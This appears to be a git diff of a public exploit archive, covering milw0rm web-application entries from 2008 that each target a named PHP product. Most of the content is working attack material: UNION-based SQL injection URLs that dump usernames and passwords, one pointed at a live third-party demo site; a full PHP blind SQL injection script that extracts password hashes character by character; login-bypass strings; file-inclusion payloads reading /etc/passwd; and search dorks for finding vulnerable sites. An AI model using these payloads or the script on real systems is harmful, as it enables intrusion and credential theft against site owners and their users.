+    global $DB_site, $dbprefix, $settings, $lang, $sess;
+    $data = $DB_site->query_first("SELECT * FROM `".$dbprefix."users_registry`
+    WHERE id='".$_POST[id]."' AND userid='".$sess->gvar('userid')."'");
+    $data = filter_data($data);
+    $out  = 'document.getElementById(\'wishform\').style.display = \'none\';';
+    $out .= 'document.getElementById(\'wisheditform\').style.display = \'block\';';
+    $out .= 'form = document.forms[\'edit_registry\'];';
+    $out .= 'form.elements[\'event[id]\'].value = \''.js_clean($data[id]).'\';';
+    $out .= 'form.elements[\'event[name]\'].value = \''.js_clean($data[name]).'\';';
+    $out .= 'form.elements[\'event[desc]\'].value = \''.js_clean($data[description]).'\';';
+    $out .= 'form.elements[\'event[month]\'].selectedIndex = '.(date('m',
+    strtotime($data['date']))-1).';';
+    $out .= 'form.elements[\'event[day]\'].selectedIndex = '.(date('d',
+    strtotime($data['date']))-1).';';
+    $out .= 'form.elements[\'event[year]\'].selectedIndex = '.((date('Y',
+    strtotime($data['date'])))-date('Y')).';';
+    return $out;
+}
+
+As seen above the SQL Injection issue here is pretty straight forward
+and is a result of a $_POST variable being used in the middle of the
+query. An attacker could exploit this SQL Injection issue by making a
+post request to "/index.php?l=edit_registry&p=1" with the following
+post data.
+
+id=-99' UNION SELECT 1,2,3,concat(username,char(58),password),5,6 FROM ss_users/*
+
+Upon successful exploitation an attacker would be presented with the
+targeted credentials. In addition to this SQL Injection are several more
+SQL Injection issues within class.ajax.php and can be found at lines 77,
+113, 138 (via the check_email() function), 349, 374, and 400. With the
+exception of the issue @ line 138 these issues are very easily identified as they use GPC variables directly within SQL queries.
+
+
+
+Solution:
+The TurnKeyWebTools developers have addressed these issues in the latest
+version of SunShop which can be found at the following url.
+
+http://www.turnkeywebtools.com/esupport/index.php?_m=news&_a=viewnews&newsid=63
+
+
+Credits:
+James Bercegay of the GulfTech Security Research Team
+
+
+
+Related Info:
+The original advisory can be found at the following location
+http://www.gulftech.org/?node=research&article_id=00125-08182008
+
+# milw0rm.com [2008-08-19]
diff --git a/platforms/php/webapps/6276.txt b/platforms/php/webapps/6276.txt
index e7ba17e3e..79f6f481a 100755
--- a/platforms/php/webapps/6276.txt
+++ b/platforms/php/webapps/6276.txt
@@ -1,52 +1,52 @@
-|___________________________________________________|
-|
-| Banner Management Script (tr.php id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------S.W.A.T.----------------------|
-|
-|    Author: S.W.A.T.
-|
-|    Home :  www.svvat.ir
-|
-|    email:  svvateam[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script : http://www.yourfreeworld.com/script/bannermanagementscript.php
-|
-| DorK   : inurl:tr.php?id= Banner
-|___________________________________________________|
-
-Exploit:
-________
-
-
-
-www.[target].com/Script/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-
-
-
-
-L!VE DEMO:
-_________
-
-
-http://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
-
-
-____________
-
-Admin Login :
-
-www.[target].com/Script/admin.php
-
-or
-
-www.[target].com/Script/adadmin.php
-
-# milw0rm.com [2008-08-19]
+|___________________________________________________|
+|
+| Banner Management Script (tr.php id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------S.W.A.T.----------------------|
+|
+|    Author: S.W.A.T.
+|
+|    Home :  www.svvat.ir
+|
+|    email:  svvateam[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script : http://www.yourfreeworld.com/script/bannermanagementscript.php
+|
+| DorK   : inurl:tr.php?id= Banner
+|___________________________________________________|
+
+Exploit:
+________
+
+
+
+www.[target].com/Script/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+
+
+
+
+L!VE DEMO:
+_________
+
+
+http://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
+
+
+____________
+
+Admin Login :
+
+www.[target].com/Script/admin.php
+
+or
+
+www.[target].com/Script/adadmin.php
+
+# milw0rm.com [2008-08-19]
diff --git a/platforms/php/webapps/6277.txt b/platforms/php/webapps/6277.txt
index 6e4a7f018..004642503 100755
--- a/platforms/php/webapps/6277.txt
+++ b/platforms/php/webapps/6277.txt
@@ -1,45 +1,45 @@
-|___________________________________________________|
-|
-| Bookmarks V 1.1.02 (id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  www.tryag.cc/cc
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|                                                   |
-|
-| script : http://lbstone.com/apb/?version=1.1.02
-|
-| DorK   : Powered by Active PHP Bookmarks v1.1.02
-|
-| DorK   : inurl:bookmarks/view_group.php?id=
-|___________________________________________________|
-
-
-
-
-
-Exploit: 
-
-www.[target].com/Script/view_group.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+apb_users--
-
-
-
-____________________________( Greetz )____________________________
-|
-| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
-|  
-| Iraqihack | FAHD | mos_chori | Silic0n
-|
-|_________________________________________________________________
-
-
-                       Im IRAQi
-
-# milw0rm.com [2008-08-19]
+|___________________________________________________|
+|
+| Bookmarks V 1.1.02 (id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  www.tryag.cc/cc
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|                                                   |
+|
+| script : http://lbstone.com/apb/?version=1.1.02
+|
+| DorK   : Powered by Active PHP Bookmarks v1.1.02
+|
+| DorK   : inurl:bookmarks/view_group.php?id=
+|___________________________________________________|
+
+
+
+
+
+Exploit: 
+
+www.[target].com/Script/view_group.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+apb_users--
+
+
+
+____________________________( Greetz )____________________________
+|
+| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
+|  
+| Iraqihack | FAHD | mos_chori | Silic0n
+|
+|_________________________________________________________________
+
+
+                       Im IRAQi
+
+# milw0rm.com [2008-08-19]
diff --git a/platforms/php/webapps/6280.txt b/platforms/php/webapps/6280.txt
index de101b32f..dfeecc208 100755
--- a/platforms/php/webapps/6280.txt
+++ b/platforms/php/webapps/6280.txt
@@ -1,31 +1,31 @@
-phpBazar SQL Injection Vulnerability all versions
-by:  e.wiZz!
-info: Bosnian Idiot FTW!
-
-In the wild....
-*********************************************************************
-Script site : http://www.smartisoft.com/
-
-Vulnerability:
-http://inthewild.com//classified.php?catid=x&subcatid=x&adid=x SQL INJECTION
-
-PoC on demo site:
-
-http://www.phpbazar.com/bazar/classified.php?catid=2&subcatid=5&adid=832 order by 911/*
-Unknown column '911' in 'order clause'
-
-http://www.phpbazar.com/bazar/classified.php?catid=2&subcatid=5&adid=832 order by 67/*
-Unknown column '67' in 'order clause'
-
-http://www.phpbazar.com/bazar/classified.php?catid=2&subcatid=5&adid=832 order by 66/*
-Error : Database Query Error
-
-...so its 66...omg :D
-you can find columns this like:
-http://www.phpbazar.com/bazar/classified.php?catid=2&subcatid=5&adid=832 union select sum(somecolumn) from users--
-
-username,password:
-
-http://www.xxx.com/bazar/classified.php?catid=2&subcatid=5&adid=832 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,username,password,53,54,55,56,57,58,59,60,61,62,63,64,65,66 from mysql.user/*
-
-# milw0rm.com [2008-08-20]
+phpBazar SQL Injection Vulnerability all versions
+by:  e.wiZz!
+info: Bosnian Idiot FTW!
+
+In the wild....
+*********************************************************************
+Script site : http://www.smartisoft.com/
+
+Vulnerability:
+http://inthewild.com//classified.php?catid=x&subcatid=x&adid=x SQL INJECTION
+
+PoC on demo site:
+
+http://www.phpbazar.com/bazar/classified.php?catid=2&subcatid=5&adid=832 order by 911/*
+Unknown column '911' in 'order clause'
+
+http://www.phpbazar.com/bazar/classified.php?catid=2&subcatid=5&adid=832 order by 67/*
+Unknown column '67' in 'order clause'
+
+http://www.phpbazar.com/bazar/classified.php?catid=2&subcatid=5&adid=832 order by 66/*
+Error : Database Query Error
+
+...so its 66...omg :D
+you can find columns this like:
+http://www.phpbazar.com/bazar/classified.php?catid=2&subcatid=5&adid=832 union select sum(somecolumn) from users--
+
+username,password:
+
+http://www.xxx.com/bazar/classified.php?catid=2&subcatid=5&adid=832 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,username,password,53,54,55,56,57,58,59,60,61,62,63,64,65,66 from mysql.user/*
+
+# milw0rm.com [2008-08-20]
diff --git a/platforms/php/webapps/6281.pl b/platforms/php/webapps/6281.pl
index 4562c55d0..57bef5aaa 100755
--- a/platforms/php/webapps/6281.pl
+++ b/platforms/php/webapps/6281.pl
@@ -1,85 +1,85 @@
- php '.$argv[0].' http://www.site.com/en/****.php?we_objectID=21 1
-#                                                             
-###############################################################
-');
-if ($argc > 1) {
-$url = $argv[1];
-if ($argc < 3) {
-$userid = 1;
-} else {
-$userid = $argv[2];
-}
-$r = strlen(file_get_contents($url."'and+1=1/*"));
-echo "\nExploiting:\n";
-$w = strlen(file_get_contents($url."'and+1=0/*"));
-$t = abs((100-($w/$r*100)));
-echo "Password: ";
-for ($j = 1; $j <= 32; $j++) {
-   for ($i = 46; $i <= 102; $i=$i+2) {
-      if ($i == 60) {
-         $i = 98;
-      }
-      $laenge = strlen(file_get_contents($url."'and+ascii(substring((select+passwd+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*"));
-      if (abs((100-($laenge/$r*100))) > $t-1) {
-         $laenge = strlen(file_get_contents($url."'and+ascii(substring((select+passwd+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*"));
-         if (abs((100-($laenge/$r*100))) > $t-1) {
-            echo chr($i-1);
-         } else {
-            echo chr($i);
-         }
-         $i = 102;
-      }
-   }
-}
-echo "\nUsername: ";
-for ($i=1; $i <= 30; $i++) {
-$laenge = strlen(file_get_contents($url."'and+ascii(substring((select+username+from+tblUser+where+id=".$userid."+limit+0,1),".$i.",1))!=0/*"));
-   if (abs((100-($laenge/$r*100))) > $t-1) {
-      $count = $i;
-      $i = 30;
-   }
-}
-for ($j = 1; $j < $count; $j++) {
-   for ($i = 46; $i <= 122; $i=$i+2) {
-      if ($i == 60) {
-         $i = 98;
-      }
-      $laenge = strlen(file_get_contents($url."'and+ascii(substring((select+username+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*"));
-      if (abs((100-($laenge/$r*100))) > $t-1) {
-         $laenge = strlen(file_get_contents($url."'and+ascii(substring((select+username+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*"));
-         if (abs((100-($laenge/$r*100))) > $t-1) {
-            echo chr($i-1);
-         } else {
-            echo chr($i);
-         }
-         $i = 122;
-      }
-   }
-}
-
-} else {
-echo "\nExploiting failed: Not enough arguments?\n";
-}
-?>
-
-# milw0rm.com [2008-08-20]
+ php '.$argv[0].' http://www.site.com/en/****.php?we_objectID=21 1
+#                                                             
+###############################################################
+');
+if ($argc > 1) {
+$url = $argv[1];
+if ($argc < 3) {
+$userid = 1;
+} else {
+$userid = $argv[2];
+}
+$r = strlen(file_get_contents($url."'and+1=1/*"));
+echo "\nExploiting:\n";
+$w = strlen(file_get_contents($url."'and+1=0/*"));
+$t = abs((100-($w/$r*100)));
+echo "Password: ";
+for ($j = 1; $j <= 32; $j++) {
+   for ($i = 46; $i <= 102; $i=$i+2) {
+      if ($i == 60) {
+         $i = 98;
+      }
+      $laenge = strlen(file_get_contents($url."'and+ascii(substring((select+passwd+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*"));
+      if (abs((100-($laenge/$r*100))) > $t-1) {
+         $laenge = strlen(file_get_contents($url."'and+ascii(substring((select+passwd+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*"));
+         if (abs((100-($laenge/$r*100))) > $t-1) {
+            echo chr($i-1);
+         } else {
+            echo chr($i);
+         }
+         $i = 102;
+      }
+   }
+}
+echo "\nUsername: ";
+for ($i=1; $i <= 30; $i++) {
+$laenge = strlen(file_get_contents($url."'and+ascii(substring((select+username+from+tblUser+where+id=".$userid."+limit+0,1),".$i.",1))!=0/*"));
+   if (abs((100-($laenge/$r*100))) > $t-1) {
+      $count = $i;
+      $i = 30;
+   }
+}
+for ($j = 1; $j < $count; $j++) {
+   for ($i = 46; $i <= 122; $i=$i+2) {
+      if ($i == 60) {
+         $i = 98;
+      }
+      $laenge = strlen(file_get_contents($url."'and+ascii(substring((select+username+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*"));
+      if (abs((100-($laenge/$r*100))) > $t-1) {
+         $laenge = strlen(file_get_contents($url."'and+ascii(substring((select+username+from+tblUser+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*"));
+         if (abs((100-($laenge/$r*100))) > $t-1) {
+            echo chr($i-1);
+         } else {
+            echo chr($i);
+         }
+         $i = 122;
+      }
+   }
+}
+
+} else {
+echo "\nExploiting failed: Not enough arguments?\n";
+}
+?>
+
+# milw0rm.com [2008-08-20]
diff --git a/platforms/php/webapps/6284.txt b/platforms/php/webapps/6284.txt
index 5ce37ceb4..80bdf1cc8 100755
--- a/platforms/php/webapps/6284.txt
+++ b/platforms/php/webapps/6284.txt
@@ -1,24 +1,24 @@
-Author: ~!Dok_tOR!~
-Date found: 21.08.08
-Product: CCMS Gaming Portal
-Version: 4.0
-The price: $55
-URL: customcms.net
-Vulnerability Class: SQL injection
-
-print.php
-
-Vuln code:
-
-$q = mysql_query("SELECT * from ccms_news_comments WHERE w_id='$id'");
-
-
-magic_quotes_gpc = Off
-
-http://localhost/[installdir]/
-
-Exploit:
-
-print.php?id='+union+select+1,concat_ws(0x3a,usern ame,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21+from+ccms_user+where+userid=1/*
-
-# milw0rm.com [2008-08-21]
+Author: ~!Dok_tOR!~
+Date found: 21.08.08
+Product: CCMS Gaming Portal
+Version: 4.0
+The price: $55
+URL: customcms.net
+Vulnerability Class: SQL injection
+
+print.php
+
+Vuln code:
+
+$q = mysql_query("SELECT * from ccms_news_comments WHERE w_id='$id'");
+
+
+magic_quotes_gpc = Off
+
+http://localhost/[installdir]/
+
+Exploit:
+
+print.php?id='+union+select+1,concat_ws(0x3a,usern ame,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21+from+ccms_user+where+userid=1/*
+
+# milw0rm.com [2008-08-21]
diff --git a/platforms/php/webapps/6285.txt b/platforms/php/webapps/6285.txt
index 21f6250ce..d0d226d93 100755
--- a/platforms/php/webapps/6285.txt
+++ b/platforms/php/webapps/6285.txt
@@ -1,61 +1,61 @@
-Author: ~!Dok_tOR!~
-Date found: 18.08.08
-Product: PhotoCart
-Version: 3.9 возможно и более ранние версии
-Type: Photography Shopping Cart
-URL: www.picturespro.com
-Vulnerability Class: SQL Injection
-
-/[installdir]/search.php
-
-Vuln code:
-
-PHP:
-if($_REQUEST['searchby'] == "qtitle") {
-$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_title LIKE '%".$_REQUEST['qtitle']."%' ";
-print "Results for Gallery or event name: ".$_REQUEST['qtitle']." ";
-}
-if($_REQUEST['searchby'] == "qid") {
-$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_id='".$_REQUEST['qid']."' ";
-print "Results for Gallery or event ID: ".$_REQUEST['qid']." ";
-}
-if($_REQUEST['searchby'] == "qdate") {
-$gdate = "".$_REQUEST['qyear']."-".$_REQUEST['qmonth']."-".$_REQUEST['qday']."";
-$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_date='$gdate' ";
-print "Results for Gallery or event date: ".$_REQUEST['qmonth']."-".$_REQUEST['qday']."-".$_REQUEST['qyear']." ";
-}
-
-
-magic_quotes_gpc = Off
-
-Example:
-http://[server]/[installdir]/search.php
-
-Вводим в поле Gallery or event name:
-
-Exploit 1:
-
-' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26 from admin/*
-
-
-
-Exploit 2:
-
-' union select 1,2,3,4,5,concat_ws(0x3a,client_name,client_pass,c lient_email),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26 from pc_clients/*
-
-
-
-Authentication Bypass SQL Injection
-
-/[installdir]/_login.php
-
-Vuln code:
-
-PHP:
-$result = @mysql_query("SELECT * FROM pc_clients WHERE client_email='".$_REQUEST['email']."' AND client_pass='".$_REQUEST['password']."'");
-
-
-Email Address: 1' or 1=1/*
-Password: 1' or 1=1/*
-
-# milw0rm.com [2008-08-21]
+Author: ~!Dok_tOR!~
+Date found: 18.08.08
+Product: PhotoCart
+Version: 3.9 возможно и более ранние версии
+Type: Photography Shopping Cart
+URL: www.picturespro.com
+Vulnerability Class: SQL Injection
+
+/[installdir]/search.php
+
+Vuln code:
+
+PHP:
+if($_REQUEST['searchby'] == "qtitle") {
+$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_title LIKE '%".$_REQUEST['qtitle']."%' ";
+print "Results for Gallery or event name: ".$_REQUEST['qtitle']." ";
+}
+if($_REQUEST['searchby'] == "qid") {
+$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_id='".$_REQUEST['qid']."' ";
+print "Results for Gallery or event ID: ".$_REQUEST['qid']." ";
+}
+if($_REQUEST['searchby'] == "qdate") {
+$gdate = "".$_REQUEST['qyear']."-".$_REQUEST['qmonth']."-".$_REQUEST['qday']."";
+$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_date='$gdate' ";
+print "Results for Gallery or event date: ".$_REQUEST['qmonth']."-".$_REQUEST['qday']."-".$_REQUEST['qyear']." ";
+}
+
+
+magic_quotes_gpc = Off
+
+Example:
+http://[server]/[installdir]/search.php
+
+Вводим в поле Gallery or event name:
+
+Exploit 1:
+
+' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26 from admin/*
+
+
+
+Exploit 2:
+
+' union select 1,2,3,4,5,concat_ws(0x3a,client_name,client_pass,c lient_email),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26 from pc_clients/*
+
+
+
+Authentication Bypass SQL Injection
+
+/[installdir]/_login.php
+
+Vuln code:
+
+PHP:
+$result = @mysql_query("SELECT * FROM pc_clients WHERE client_email='".$_REQUEST['email']."' AND client_pass='".$_REQUEST['password']."'");
+
+
+Email Address: 1' or 1=1/*
+Password: 1' or 1=1/*
+
+# milw0rm.com [2008-08-21]
diff --git a/platforms/php/webapps/6286.txt b/platforms/php/webapps/6286.txt
index 5be063705..5c2859dd3 100755
--- a/platforms/php/webapps/6286.txt
+++ b/platforms/php/webapps/6286.txt
@@ -1,32 +1,32 @@
-###########################################################################
-[+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF
-[+] Discovered By SirGod                         
-[+] www.mortal-team.org                         
-[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN
-###########################################################################
-
-[+] Arbitrary Download Database
-
-Go to
-
-   http://localhost/[Path]/adminpanel/phpmydump.php
-
-and the download will begin ( database.sql ) .
-
-
-[+] Cross Site Scripting
-
-    http://localhost/[Path]/merchandise.php?type=[XSS]
-    http://localhost/[Path]/merchandise.php?type=
-
-
-[+] Cross Site Request Forgery
-
- If a logged in user with administrator privilegies click the following url he will be logged out.
-
-    http://localhost/[Path]/adminpanel/logout.php
-
-
-###########################################################################
-
-# milw0rm.com [2008-08-21]
+###########################################################################
+[+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF
+[+] Discovered By SirGod                         
+[+] www.mortal-team.org                         
+[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN
+###########################################################################
+
+[+] Arbitrary Download Database
+
+Go to
+
+   http://localhost/[Path]/adminpanel/phpmydump.php
+
+and the download will begin ( database.sql ) .
+
+
+[+] Cross Site Scripting
+
+    http://localhost/[Path]/merchandise.php?type=[XSS]
+    http://localhost/[Path]/merchandise.php?type=
+
+
+[+] Cross Site Request Forgery
+
+ If a logged in user with administrator privilegies click the following url he will be logged out.
+
+    http://localhost/[Path]/adminpanel/logout.php
+
+
+###########################################################################
+
+# milw0rm.com [2008-08-21]
diff --git a/platforms/php/webapps/6287.txt b/platforms/php/webapps/6287.txt
index 509e5468a..9b1ca8ce0 100755
--- a/platforms/php/webapps/6287.txt
+++ b/platforms/php/webapps/6287.txt
@@ -1,30 +1,30 @@
-########################################################################################
-#
-#   Name        :   tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability
-#   Author      :   cOndemned [ Dark-Coders ]
-#   Greetz      :   Avantura, str0ke, ZaBeaTy, doctor, voo|doo, sid.psycho, irk4z
-#   Conditions  :   Magic quotes gpc = Off / Register Globals = On
-#   Other info  :   Prior versions probably are vulnerable too
-#
-########################################################################################
-
-Source of /modules/ZZ_Templater/templater.php
-
-    [ ... ]
-    
-    17.     $ftemplatedir = 'templates/'.$config['template'].'/';
-    18.     include('templates/'.$config['template'].'/data.php');      // <--- LFI
-    19.     if($tdata['useblocks'] == 1)
-    
-    [ ... ]
-    
-
-Proof of Concept :
-
-    http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00
-    http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00
-    
-
-Jusf 4 fun    
-
-# milw0rm.com [2008-08-21]
+########################################################################################
+#
+#   Name        :   tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability
+#   Author      :   cOndemned [ Dark-Coders ]
+#   Greetz      :   Avantura, str0ke, ZaBeaTy, doctor, voo|doo, sid.psycho, irk4z
+#   Conditions  :   Magic quotes gpc = Off / Register Globals = On
+#   Other info  :   Prior versions probably are vulnerable too
+#
+########################################################################################
+
+Source of /modules/ZZ_Templater/templater.php
+
+    [ ... ]
+    
+    17.     $ftemplatedir = 'templates/'.$config['template'].'/';
+    18.     include('templates/'.$config['template'].'/data.php');      // <--- LFI
+    19.     if($tdata['useblocks'] == 1)
+    
+    [ ... ]
+    
+
+Proof of Concept :
+
+    http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00
+    http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00
+    
+
+Jusf 4 fun    
+
+# milw0rm.com [2008-08-21]
diff --git a/platforms/php/webapps/6288.txt b/platforms/php/webapps/6288.txt
index 9cb1ac6fd..f6a069e40 100755
--- a/platforms/php/webapps/6288.txt
+++ b/platforms/php/webapps/6288.txt
@@ -1,47 +1,47 @@
-####################################################################
-[+] EasySite v2.3 Multiple Remote Vulnerabilities   
-[+] Discovered By SirGod                          
-[+] www.mortal-team.org                          
-[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin ,ToxicBlood,MesSiAH,xZu,HrN
-####################################################################
-
-[+] Local File Inclusion
-
-http://localhost/www/index.php?module=Accueil&action=../../../../autoexec.bat%00
-http://localhost/modules/Module/index.php?module=../../../../autoexec.bat%00
-http://localhost/modules/Module/index.php?ss_module=../../../../autoexec.bat%00
-http://localhost/modules/Module/index.php?ss_action=../../../../autoexec.bat%00
-http://localhost/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00
-http://localhost/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00
-http://localhost/modules/Themes/index.php?module=../../../../autoexec.bat%00
-
-And many others...
-
-This will open autoexec.bat
-
-[+] Arbitrary View Folder Contents
-
-You can view the folder contents and the content of files view via LFI.
-
-    http://localhost/www/index.php?module=../../../
-
-    http://localhost/inc/vmenu.php?module=../../../
-
-This will open C:/ directory and will show all the files from C:/ .
-
-Example :
-
-    * BOOTSECT.BAK
-    * BcBtRmv.log
-    * IO.SYS
-    * MSDOS.SYS
-    * autoexec.bat
-    * bootmgr
-    * config.sys
-    * grldr
-    * hiberfil.sys
-    * pagefile.sys
-
-####################################################################
-
-# milw0rm.com [2008-08-21]
+####################################################################
+[+] EasySite v2.3 Multiple Remote Vulnerabilities   
+[+] Discovered By SirGod                          
+[+] www.mortal-team.org                          
+[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin ,ToxicBlood,MesSiAH,xZu,HrN
+####################################################################
+
+[+] Local File Inclusion
+
+http://localhost/www/index.php?module=Accueil&action=../../../../autoexec.bat%00
+http://localhost/modules/Module/index.php?module=../../../../autoexec.bat%00
+http://localhost/modules/Module/index.php?ss_module=../../../../autoexec.bat%00
+http://localhost/modules/Module/index.php?ss_action=../../../../autoexec.bat%00
+http://localhost/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00
+http://localhost/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00
+http://localhost/modules/Themes/index.php?module=../../../../autoexec.bat%00
+
+And many others...
+
+This will open autoexec.bat
+
+[+] Arbitrary View Folder Contents
+
+You can view the folder contents and the content of files view via LFI.
+
+    http://localhost/www/index.php?module=../../../
+
+    http://localhost/inc/vmenu.php?module=../../../
+
+This will open C:/ directory and will show all the files from C:/ .
+
+Example :
+
+    * BOOTSECT.BAK
+    * BcBtRmv.log
+    * IO.SYS
+    * MSDOS.SYS
+    * autoexec.bat
+    * bootmgr
+    * config.sys
+    * grldr
+    * hiberfil.sys
+    * pagefile.sys
+
+####################################################################
+
+# milw0rm.com [2008-08-21]
diff --git a/platforms/php/webapps/6291.txt b/platforms/php/webapps/6291.txt
index 708642550..12a70ec69 100755
--- a/platforms/php/webapps/6291.txt
+++ b/platforms/php/webapps/6291.txt
@@ -1,196 +1,196 @@
-################################################################################
-[+] NoName Script 1.1 BETA Multiple Remote Vulnerabilities  
-[+] Discovered By SirGod                         
-[+] www.mortal-team.org                         
-[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
-#################################################################################
-
-[+] Local File Inclusion
-
-     http://localhost/index.php?action=../../../autoexec.bat%00&kategorie=Tutorial
-     
-    This will open autoexec.bat .
-
-[+] SQL Injection   
-
-     http://localhost/index.php?action=newsadmindel&file_id=[SQL]
-     
-[+] Cross Site Request Forgery     
-
-     If an logged in user with administrative permisions will click the following link ,he will be logged out.
-
-     http://localhost/logout.php
-
-[+] Cross Site Request Forgery - Change User Profile
-
-    If an logged in user with administrative permisions will click the following link the following action will be executed.
-
-    What to change :
-   
-    - form action and profil_id : 
    
-       action : change http://localhost with the website link.
-       profil_id : id of the user that you want to change settings for it
-    - input value : 
    
-        
-            
-        
-        
-            
-            
-
-        
-        
-            
-            
-        
-        
-            
-
-        
-        
-            
-        
-        
-            
-            
-        
-
-        
-            
-            
-        
-        
-            
-            
-        
-
-            
-            
-        
-        
-            
-        
-        
-            
-        
-        
-            
-            
-        
-        
-            
-
-            
-        
-        
-            
-            
-        
-                
-            
-
-        
-        
-            
-        
-        
-            
-            
-        
-        
-            
-            
-
-        
-                
-            
-        
-        
-            
-            
-        
-
-    
    
-                Benutzerinformationen
-            
    Benutzername: 
    Benutzergruppe: 
-                                
-            
    
-                Zusätzliche Informationen
-            
    Geschlecht: 
-
-                
-            
    Geburtstag: 
-                
-
-                
-
-                
-            
    Benutzertext: 
-        
    Homepage: 
    
-
-                Instant Messaging
-            
    ICQ-Nummer: 
    MSN-Name: 
    AIM-Name: 
    
-                Verwarnungen
-            
     
-
-            Admin wurde noch nicht verwarnt.            
    Aktion: 
-                Verwarnungen verwalten
-            
     
     
    
-    
-
-#################################################################################
-
-# milw0rm.com [2008-08-23]
+################################################################################
+[+] NoName Script 1.1 BETA Multiple Remote Vulnerabilities  
+[+] Discovered By SirGod                         
+[+] www.mortal-team.org                         
+[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
+#################################################################################
+
+[+] Local File Inclusion
+
+     http://localhost/index.php?action=../../../autoexec.bat%00&kategorie=Tutorial
+     
+    This will open autoexec.bat .
+
+[+] SQL Injection   
+
+     http://localhost/index.php?action=newsadmindel&file_id=[SQL]
+     
+[+] Cross Site Request Forgery     
+
+     If an logged in user with administrative permisions will click the following link ,he will be logged out.
+
+     http://localhost/logout.php
+
+[+] Cross Site Request Forgery - Change User Profile
+
+    If an logged in user with administrative permisions will click the following link the following action will be executed.
+
+    What to change :
+   
+    - form action and profil_id : 
    
+       action : change http://localhost with the website link.
+       profil_id : id of the user that you want to change settings for it
+    - input value : 
    
+        
+            
+        
+        
+            
+            
+
+        
+        
+            
+            
+        
+        
+            
